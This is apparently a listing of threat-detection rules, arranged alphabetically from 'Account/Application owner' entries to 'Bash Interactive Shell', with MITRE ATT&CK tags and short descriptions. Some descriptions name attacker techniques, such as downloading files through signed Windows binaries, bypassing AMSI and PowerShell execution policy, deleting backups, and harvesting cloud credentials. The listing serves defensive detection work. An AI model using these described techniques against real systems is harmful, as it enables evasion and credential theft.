    Aug 12, 2024 · attack.t1552 attack.credential-access

    Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.

  • AddinUtil.EXE Execution From Uncommon Directory

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.

  • Addition of SID History to Active Directory Object

    Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1134.005

    An attacker can use the SID history attribute to gain additional privileges.

  • ADFS Database Named Pipe Connection By Uncommon Tool

    Aug 12, 2024 · attack.collection attack.t1005

    Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Used to access information such as the AD FS configuration settings, which contain sensitive information used to sign SAML tokens.

  • Admin User Remote Logon

    Aug 12, 2024 · attack.lateral-movement attack.t1078.001 attack.t1078.002 attack.t1078.003 car.2016-04-005

    Detects remote login by an Administrator user (depending on internal naming pattern).

  • ADSelfService Exploitation

    Aug 12, 2024 · cve.2021-40539 detection.emerging-threats attack.initial-access attack.t1190

    Detects suspicious access to URLs that were observed in cases in which attackers exploited the ADSelfService vulnerability CVE-2021-40539.

  • ADSI-Cache File Creation By Uncommon Tool

    Aug 12, 2024 · attack.t1001.003 attack.command-and-control

    Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.

  • Advanced IP Scanner - File Event

    Aug 12, 2024 · attack.discovery attack.t1046

    Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.

  • Adwind RAT / JRAT

    Aug 12, 2024 · attack.execution attack.t1059.005 attack.t1059.007 detection.emerging-threats

    Detects javaw.exe in the AppData folder as used by Adwind / JRAT.

  • Adwind RAT / JRAT File Artifact

    Aug 12, 2024 · attack.execution attack.t1059.005 attack.t1059.007

    Detects javaw.exe in the AppData folder as used by Adwind / JRAT.

  • AgentExecutor PowerShell Execution

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects execution of the AgentExecutor.exe binary, which can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy "Bypass", or any binary named "powershell.exe" located in the path provided by the 6th positional argument.

  • All Backups Deleted Via Wbadmin.EXE

    Aug 12, 2024 · attack.impact attack.t1490

    Detects the deletion of all backups or system state backups via "wbadmin.exe". This technique is used by numerous ransomware families and actors. This may only be successful on server platforms that have Windows Backup enabled.

  • Allow RDP Remote Assistance Feature

    Aug 12, 2024 · attack.defense-evasion attack.t1112

    Detects enabling the RDP Remote Assistance feature to allow a specific user to connect via RDP to the targeted machine.

  • Allow Service Access Using Security Descriptor Tampering Via Sc.EXE

    Aug 12, 2024 · attack.persistence attack.t1543.003

    Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.

  • Alternate PowerShell Hosts - PowerShell Module

    Aug 12, 2024 · attack.execution attack.t1059.001

    Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe.

  • Always Install Elevated MSI Spawned Cmd And Powershell

    Aug 12, 2024 · attack.privilege-escalation attack.t1548.002

    Detects the Windows Installer service (msiexec.exe) spawning "cmd" or "powershell".

  • AMSI Bypass Pattern Assembly GetType

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001 attack.execution

    Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts.

  • Amsi.DLL Loaded Via LOLBIN Process

    Aug 12, 2024 · attack.defense-evasion

    Detects loading of "Amsi.dll" by a living-off-the-land process. This could be an indication of a "PowerShell without PowerShell" attack.

  • Anomalous Token

    Aug 12, 2024 · attack.t1528 attack.credential-access

    Indicates that there are abnormal characteristics in the token, such as an unusual token lifetime or a token that is replayed from an unfamiliar location.

  • Anomalous User Activity

    Aug 12, 2024 · attack.t1098 attack.persistence

    Indicates that there are anomalous patterns of behavior, like suspicious changes to the directory.

  • Anonymous IP Address

    Aug 12, 2024 · attack.t1528 attack.credential-access

    Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.

  • Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection

    Aug 12, 2024 · attack.privilege-escalation attack.t1055

    Detects the suspicious file that is created by PoC code against the Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675.

  • Anydesk Temporary Artefact

    Aug 12, 2024 · attack.command-and-control attack.t1219

    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

  • Apache Segmentation Fault

    Aug 12, 2024 · attack.impact attack.t1499.004

    Detects a segmentation fault error message caused by a crashing Apache worker process.

  • Apache Spark Shell Command Injection - ProcessCreation

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2022-33891

    Detects attempts to exploit an Apache Spark server via CVE-2014-6287 from a command-line perspective.

  • Apache Spark Shell Command Injection - Weblogs

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2022-33891 detection.emerging-threats

    Detects attempts to exploit an Apache Spark server via CVE-2014-6287 from a web logs perspective.

  • Apache Threading Error

    Aug 12, 2024 · attack.initial-access attack.lateral-movement attack.t1190 attack.t1210

    Detects an issue in Apache logs that reports threading-related errors.

  • App Granted Microsoft Permissions

    Aug 12, 2024 · attack.credential-access attack.t1528

    Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, SharePoint, or Azure AD.

  • App Granted Privileged Delegated Or App Permissions

    Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1098.003

    Detects when an administrator grants either application permissions (app roles) or highly privileged delegated permissions.

  • Application AppID Uri Configuration Changes

    Aug 12, 2024 · attack.persistence attack.credential-access attack.privilege-escalation attack.t1552 attack.t1078.004

    Detects when a configuration change is made to an application's AppID URI.

  • Application Removed Via Wmic.EXE

    Aug 12, 2024 · attack.execution attack.t1047

    Detects the removal or uninstallation of an application via "Wmic.EXE".

  • Application Terminated Via Wmic.EXE

    Aug 12, 2024 · attack.execution attack.t1047

    Detects calls to the "terminate" function via wmic in order to kill an application.

  • Application Uninstalled

    Aug 12, 2024 · attack.impact attack.t1489

    An application has been removed. Check if it is critical.

  • Application URI Configuration Changes

    Aug 12, 2024 · attack.t1528 attack.t1078.004 attack.persistence attack.credential-access attack.privilege-escalation

    Detects when a configuration change is made to an application's URI. URIs for domain names that no longer exist (dangling URIs), URIs not using HTTPS, wildcards at the end of the domain, URIs that are not unique to that app, or URIs that point to domains you do not control should be investigated.

  • Application Using Device Code Authentication Flow

    Aug 12, 2024 · attack.t1078 attack.defense-evasion attack.persistence attack.privilege-escalation attack.initial-access

    Device code flow is an OAuth 2.0 protocol flow specifically for input-constrained devices and is not used in all environments. If this type of flow is seen in the environment and is not being used in an input-constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.

  • Applications That Are Using ROPC Authentication Flow

    Aug 12, 2024 · attack.t1078 attack.defense-evasion attack.persistence attack.privilege-escalation attack.initial-access

    Resource owner password credentials (ROPC) should be avoided if at all possible, as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.

  • AppX Package Installation Attempts Via AppInstaller.EXE

    Aug 12, 2024 · attack.command-and-control attack.t1105

    Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL.

  • APT PRIVATELOG Image Load Pattern

    Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 detection.emerging-threats

    Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances.

  • APT User Agent

    Aug 12, 2024 · attack.command-and-control attack.t1071.001

    Detects suspicious user agent strings used in APT malware in proxy logs.

  • APT29 2018 Phishing Campaign CommandLine Indicators

    Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218.011 detection.emerging-threats

    Detects indicators of the APT29 (Cozy Bear) phishing campaign as reported by Mandiant.

  • APT29 2018 Phishing Campaign File Indicators

    Aug 12, 2024 · attack.defense-evasion attack.t1218.011 detection.emerging-threats

    Detects indicators of the APT29 (Cozy Bear) phishing campaign as reported by Mandiant.

  • APT31 Judgement Panda Activity

    Aug 12, 2024 · attack.lateral-movement attack.credential-access attack.g0128 attack.t1003.001 attack.t1560.001 detection.emerging-threats

    Detects APT31 Judgement Panda activity as described in the CrowdStrike 2019 Global Threat Report.

  • APT40 Dropbox Tool User Agent

    Aug 12, 2024 · attack.command-and-control attack.t1071.001 attack.exfiltration attack.t1567.002

    Detects the suspicious user agent string of the APT40 Dropbox tool.

  • Arbitrary Binary Execution Using GUP Utility

    Aug 12, 2024 · attack.execution

    Detects execution of the Notepad++ updater (gup) to launch other commands or executables.

  • Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects execution of arbitrary DLLs or unsigned code via ".csproj" files using Dotnet.EXE.

  • Arbitrary File Download Via ConfigSecurityPolicy.EXE

    Aug 12, 2024 · attack.exfiltration attack.t1567

    Detects the execution of "ConfigSecurityPolicy.EXE", a binary that is part of Windows Defender and used to manage its settings. Users can configure different pilot collections for each of the co-management workloads. It can be abused by attackers in order to upload or download files.

  • Arbitrary File Download Via GfxDownloadWrapper.EXE

    Aug 12, 2024 · attack.command-and-control attack.t1105

    Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download a file.

  • Arbitrary File Download Via MSOHTMED.EXE

    Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218

    Detects usage of "MSOHTMED" to download arbitrary files.

  • Arbitrary File Download Via MSPUB.EXE

    Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218

    Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files.

  • Arbitrary File Download Via PresentationHost.EXE

    Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218

    Detects usage of "PresentationHost", a utility that runs ".xbap" (Browser Application) files, to download arbitrary files.

  • Arbitrary MSI Download Via Devinit.EXE

    Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1218

    Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system.

  • Arbitrary Shell Command Execution Via Settingcontent-Ms

    Aug 12, 2024 · attack.t1204 attack.t1566.001 attack.execution attack.initial-access

    The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.

  • Arcadyan Router Exploitations

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-20090 cve.2021-20091 detection.emerging-threats

    Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.

  • AspNetCompiler Execution

    Aug 12, 2024 · attack.defense-evasion attack.t1127

    Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.

  • Assembly DLL Creation Via AspNetCompiler

    Aug 12, 2024 · attack.execution

    Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.

  • Assembly Loading Via CL_LoadAssembly.ps1

    Aug 12, 2024 · attack.defense-evasion attack.t1216

    Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass AppLocker controls.

  • Atbroker Registry Change

    Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.persistence attack.t1547

    Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'

  • Atera Agent Installation

    Aug 12, 2024 · attack.t1219

    Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators

  • Atlassian Bitbucket Command Injection Via Archive API

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2022-36804 detection.emerging-threats

    Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804

  • Atlassian Confluence CVE-2022-26134

    Aug 12, 2024 · attack.initial-access attack.execution attack.t1190 attack.t1059 cve.2022-26134

    Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134

  • Atypical Travel

    Aug 12, 2024 · attack.t1078 attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access

    Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.

  • Audio Capture

    Aug 12, 2024 · attack.collection attack.t1123

    Detects attempts to record audio with the arecord utility

  • Audio Capture via PowerShell

    Aug 12, 2024 · attack.collection attack.t1123

    Detects audio capture via PowerShell Cmdlet.

  • Audio Capture via SoundRecorder

    Aug 12, 2024 · attack.collection attack.t1123

    Detects an attacker collecting audio via the SoundRecorder application.

  • Audit CVE Event

    Aug 12, 2024 · attack.execution attack.t1203 attack.privilege-escalation attack.t1068 attack.defense-evasion attack.t1211 attack.credential-access attack.t1212 attack.lateral-movement attack.t1210 attack.impact attack.t1499.004

    Detects events generated by user-mode applications when they call the CveEventWrite API because a known vulnerability is being exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability). Unfortunately, that is about the only instance of CVEs being written to this log.

  • Audit Policy Tampering Via Auditpol

    Aug 12, 2024 · attack.defense-evasion attack.t1562.002

    Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

  • Audit Policy Tampering Via NT Resource Kit Auditpol

    Aug 12, 2024 · attack.defense-evasion attack.t1562.002

    Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

  • Auditing Configuration Changes on Linux Host

    Aug 12, 2024 · attack.defense-evasion attack.t1562.006

    Detects changes in auditd configuration files

  • Authentications To Important Apps Using Single Factor Authentication

    Aug 12, 2024 · attack.initial-access attack.t1078

    Detects when authentications to important application(s) required only single-factor authentication

  • Automated Collection Bookmarks Using Get-ChildItem PowerShell

    Aug 12, 2024 · attack.discovery attack.t1217

    Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

  • Automated Collection Command PowerShell

    Aug 12, 2024 · attack.collection attack.t1119

    Once established within a system or network, an adversary may use automated techniques for collecting internal data.

  • Automated Collection Command Prompt

    Aug 12, 2024 · attack.collection attack.t1119 attack.credential-access attack.t1552.001

    Once established within a system or network, an adversary may use automated techniques for collecting internal data.

  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl

    Aug 12, 2024 · attack.defense-evasion attack.t1216

    Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File

    Aug 12, 2024 · attack.defense-evasion attack.t1216

    Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

  • AWS CloudTrail Important Change

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects disabling, deleting and updating of a Trail

  • AWS Config Disabling Channel/Recorder

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects AWS Config Service disabling

  • AWS EC2 Disable EBS Encryption

    Aug 12, 2024 · attack.impact attack.t1486 attack.t1565

    Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes.

  • AWS EC2 Startup Shell Script Change

    Aug 12, 2024 · attack.execution attack.t1059.001 attack.t1059.003 attack.t1059.004

    Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.

  • AWS EC2 VM Export Failure

    Aug 12, 2024 · attack.collection attack.t1005 attack.exfiltration attack.t1537

    An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.

  • AWS ECS Task Definition That Queries The Credential Endpoint

    Aug 12, 2024 · attack.persistence attack.t1525

    Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint. This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.

  • AWS EFS Fileshare Modified or Deleted

    Aug 12, 2024 · attack.impact

    Detects when an EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.

  • AWS EFS Fileshare Mount Modified or Deleted

    Aug 12, 2024 · attack.impact attack.t1485

    Detects when an EFS Fileshare Mount is modified or deleted. An adversary may break any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.

  • AWS EKS Cluster Created or Deleted

    Aug 12, 2024 · attack.impact attack.t1485

    Identifies when an EKS cluster is created or deleted.

  • AWS ElastiCache Security Group Created

    Aug 12, 2024 · attack.persistence attack.t1136 attack.t1136.003

    Detects when an ElastiCache security group has been created.

  • AWS ElastiCache Security Group Modified or Deleted

    Aug 12, 2024 · attack.impact attack.t1531

    Identifies when an ElastiCache security group has been modified or deleted.

  • AWS Glue Development Endpoint Activity

    Aug 12, 2024 · attack.privilege-escalation

    Detects possible suspicious glue development endpoint activity.

  • AWS GuardDuty Important Change

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.

  • AWS IAM Backdoor Users Keys

    Aug 12, 2024 · attack.persistence attack.t1098

    Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org.

  • AWS IAM S3Browser LoginProfile Creation

    Aug 12, 2024 · attack.execution attack.persistence attack.t1059.009 attack.t1078.004

    Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.

  • AWS IAM S3Browser Templated S3 Bucket Policy Creation

    Aug 12, 2024 · attack.execution attack.t1059.009 attack.persistence attack.t1078.004

    Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "".

  • AWS IAM S3Browser User or AccessKey Creation

    Aug 12, 2024 · attack.execution attack.persistence attack.t1059.009 attack.t1078.004

    Detects S3 Browser utility creating IAM User or AccessKey.

  • AWS Identity Center Identity Provider Change

    Aug 12, 2024 · attack.persistence attack.t1556

    Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider. A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.

  • AWS RDS Master Password Change

    Aug 12, 2024 · attack.exfiltration attack.t1020

    Detects the change of database master password. It may be a part of data exfiltration.

  • AWS Root Credentials

    Aug 12, 2024 · attack.privilege-escalation attack.t1078.004

    Detects AWS root account usage

  • AWS Route 53 Domain Transfer Lock Disabled

    Aug 12, 2024 · attack.persistence attack.credential-access attack.t1098

    Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.

  • AWS Route 53 Domain Transferred to Another Account

    Aug 12, 2024 · attack.persistence attack.credential-access attack.t1098

    Detects when a request has been made to transfer a Route 53 domain to another AWS account.

  • AWS S3 Data Management Tampering

    Aug 12, 2024 · attack.exfiltration attack.t1537

    Detects when a user tampers with S3 data management in Amazon Web Services.

  • AWS SecurityHub Findings Evasion

    Aug 12, 2024 · attack.defense-evasion attack.t1562

    Detects the modification of the findings on SecurityHub.

  • AWS Snapshot Backup Exfiltration

    Aug 12, 2024 · attack.exfiltration attack.t1537

    Detects the modification of an EC2 snapshot's permissions to enable access from another account

  • AWS STS AssumeRole Misuse

    Aug 12, 2024 · attack.lateral-movement attack.privilege-escalation attack.t1548 attack.t1550 attack.t1550.001

    Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.

  • AWS STS GetSessionToken Misuse

    Aug 12, 2024 · attack.lateral-movement attack.privilege-escalation attack.t1548 attack.t1550 attack.t1550.001

    Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.

  • AWS Suspicious SAML Activity

    Aug 12, 2024 · attack.initial-access attack.t1078 attack.lateral-movement attack.t1548 attack.privilege-escalation attack.t1550 attack.t1550.001

    Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.

  • AWS User Login Profile Was Modified

    Aug 12, 2024 · attack.persistence attack.t1098

    Detects activity when someone is changing passwords on behalf of other users. An attacker with the "iam:UpdateLoginProfile" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.

  • Azure Active Directory Hybrid Health AD FS New Server

    Aug 12, 2024 · attack.defense-evasion attack.t1578

    This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure.

  • Azure Active Directory Hybrid Health AD FS Service Delete

    Aug 12, 2024 · attack.defense-evasion attack.t1578.003

    This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. The health AD FS service can then be deleted after it is no longer needed via HTTP requests to Azure.

  • Azure AD Account Credential Leaked

    Aug 12, 2024 · attack.t1589 attack.reconnaissance

    Indicates that the user's valid credentials have been leaked.

  • Azure AD Health Monitoring Agent Registry Keys Access

    Aug 12, 2024 · attack.discovery attack.t1012

    This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.

  • Azure AD Health Service Agents Registry Keys Access

    Aug 12, 2024 · attack.discovery attack.t1012

    This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g. AD FS). Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys.

  • Azure AD Only Single Factor Authentication Required

    Aug 12, 2024 · attack.initial-access attack.credential-access attack.t1078.004 attack.t1556.006

    Detect when users are authenticating without MFA being required.

  • Azure AD Threat Intelligence

    Aug 12, 2024 · attack.t1078 attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access

    Indicates user activity that is unusual for the user or consistent with known attack patterns.

  • Azure Application Credential Modified

    Aug 12, 2024 · attack.impact

    Identifies when an application credential is modified.

  • Azure Application Deleted

    Aug 12, 2024 · attack.defense-evasion attack.impact attack.t1489

    Identifies when an application is deleted in Azure.

  • Azure Application Gateway Modified or Deleted

    Aug 12, 2024 · attack.impact

    Identifies when an application gateway is modified or deleted.

  • Azure Application Security Group Modified or Deleted

    Aug 12, 2024 · attack.impact

    Identifies when an application security group is modified or deleted.

  • Azure Container Registry Created or Deleted

    Aug 12, 2024 · attack.impact

    Detects when a Container Registry is created or deleted.

  • Azure Device No Longer Managed or Compliant

    Aug 12, 2024 · attack.impact

    Identifies when a device in Azure is no longer managed or compliant.

  • Azure Device or Configuration Modified or Deleted

    Aug 12, 2024 · attack.impact attack.t1485 attack.t1565.001

    Identifies when a device or device configuration in Azure is modified or deleted.

  • Azure DNS Zone Modified or Deleted

    Aug 12, 2024 · attack.impact attack.t1565.001

    Identifies when a DNS zone is modified or deleted.

  • Azure Domain Federation Settings Modified

    Aug 12, 2024 · attack.initial-access attack.t1078

    Identifies when a user or application modifies the federation settings on the domain.

  • Azure Firewall Modified or Deleted

    Aug 12, 2024 · attack.impact attack.defense-evasion attack.t1562.004

    Identifies when a firewall is created, modified, or deleted.

  • Azure Firewall Rule Collection Modified or Deleted

    Aug 12, 2024 · attack.impact attack.defense-evasion attack.t1562.004

    Identifies when Rule Collections (Application, NAT, and Network) are being modified or deleted.

  • Azure Firewall Rule Configuration Modified or Deleted

    Aug 12, 2024 · attack.impact

    Identifies when a Firewall Rule Configuration is modified or deleted.

  • Azure Key Vault Modified or Deleted

    Aug 12, 2024 · attack.impact attack.credential-access attack.t1552 attack.t1552.001

    Identifies when a key vault is modified or deleted.

  • Azure Keyvault Key Modified or Deleted

    Aug 12, 2024 · attack.impact attack.credential-access attack.t1552 attack.t1552.001

    Identifies when a Keyvault Key is modified or deleted in Azure.

  • Azure Keyvault Secrets Modified or Deleted

    Aug 12, 2024 · attack.impact attack.credential-access attack.t1552 attack.t1552.001

    Identifies when secrets are modified or deleted in Azure.

  • Azure Kubernetes Admission Controller

    Aug 12, 2024 · attack.persistence attack.t1078 attack.credential-access attack.t1552 attack.t1552.007

    Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can also use a ValidatingAdmissionWebhook to obtain access credentials: the webhook can intercept the requests to the API server and record secrets and other sensitive information.

  • Azure Kubernetes Cluster Created or Deleted

    Aug 12, 2024 · attack.impact

    Detects when an Azure Kubernetes Cluster is created or deleted.

  • Azure Kubernetes CronJob

    Aug 12, 2024 · attack.persistence attack.t1053.003 attack.privilege-escalation attack.execution

    Identifies when an Azure Kubernetes CronJob runs in Azure Cloud. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. A Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. A Kubernetes CronJob is used to schedule Jobs. An adversary may use a Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.

  • Azure Kubernetes Events Deleted

    Aug 12, 2024 · attack.defense-evasion attack.t1562 attack.t1562.001

    Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.

  • Azure Kubernetes Network Policy Change

    Aug 12, 2024 · attack.impact attack.credential-access

    Identifies when an Azure Kubernetes network policy is modified or deleted.

  • Azure Kubernetes Pods Deleted

    Aug 12, 2024 · attack.impact

    Identifies the deletion of Azure Kubernetes Pods.

  • Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted

    Aug 12, 2024 · attack.impact attack.credential-access

    Detects the creation or patching of potentially malicious RoleBinding/ClusterRoleBinding.

  • Azure Kubernetes Secret or Config Object Access

    Aug 12, 2024 · attack.impact

    Identifies when a Kubernetes account accesses sensitive objects such as configmaps or secrets.

  • Azure Kubernetes Sensitive Role Access

    Aug 12, 2024 · attack.impact

    Identifies when ClusterRoles/Roles are being modified or deleted.

  • Azure Kubernetes Service Account Modified or Deleted

    Aug 12, 2024 · attack.impact attack.t1531

    Identifies when a service account is modified or deleted.

  • Azure Network Firewall Policy Modified or Deleted

    Aug 12, 2024 · attack.impact attack.defense-evasion attack.t1562.007

    Identifies when a Firewall Policy is modified or deleted.

  • Azure Network Security Configuration Modified or Deleted

    Aug 12, 2024 · attack.impact

    Identifies when a network security configuration is modified or deleted.

  • Azure New CloudShell Created

    Aug 12, 2024 · attack.execution attack.t1059

    Identifies when a new cloudshell is created inside of Azure portal.

  • Azure Owner Removed From Application or Service Principal

    Aug 12, 2024 · attack.defense-evasion

    Identifies when an owner was removed from an application or service principal in Azure.

  • Azure Point-to-site VPN Modified or Deleted

    Aug 12, 2024 · attack.impact

    Identifies when a Point-to-site VPN is modified or deleted.

  • Azure Service Principal Created

    Aug 12, 2024 · attack.defense-evasion

    Identifies when a service principal is created in Azure.

  • Azure Service Principal Removed

    Aug 12, 2024 · attack.defense-evasion

    Identifies when a service principal was removed in Azure.

  • Azure Subscription Permission Elevation Via ActivityLogs

    Aug 12, 2024 · attack.initial-access attack.t1078.004

    Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.

  • Azure Subscription Permission Elevation Via AuditLogs

    Aug 12, 2024 · attack.initial-access attack.t1078

    Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.

  • Azure Suppression Rule Created

    Aug 12, 2024 · attack.impact

    Identifies when a suppression rule is created in Azure. Adversaries could attempt this to evade detection.

  • Azure Unusual Authentication Interruption

    Aug 12, 2024 · attack.initial-access attack.t1078

    Detects when there is an interruption in the authentication process.

  • Azure Virtual Network Device Modified or Deleted

    Aug 12, 2024 · attack.impact

    Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router.

  • Azure Virtual Network Modified or Deleted

    Aug 12, 2024 · attack.impact

    Identifies when a Virtual Network is modified or deleted in Azure.

  • Azure VPN Connection Modified or Deleted

    Aug 12, 2024 · attack.impact

    Identifies when a VPN connection is modified or deleted.

  • Backup Catalog Deleted

    Aug 12, 2024 · attack.defense-evasion attack.t1070.004

    Detects backup catalog deletions

  • Bad Opsec Powershell Code Artifacts

    Aug 12, 2024 · attack.execution attack.t1059.001

    Focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec.

  • Base64 Encoded PowerShell Command Detected

    Aug 12, 2024 · attack.t1027 attack.defense-evasion attack.t1140 attack.t1059.001

    Detects usage of the "FromBase64String" function in the command line, which is used to decode a base64 encoded string

  • Base64 MZ Header In CommandLine

    Aug 12, 2024 · attack.execution

    Detects a base64-encoded MZ header in the command line

  • Bash Interactive Shell

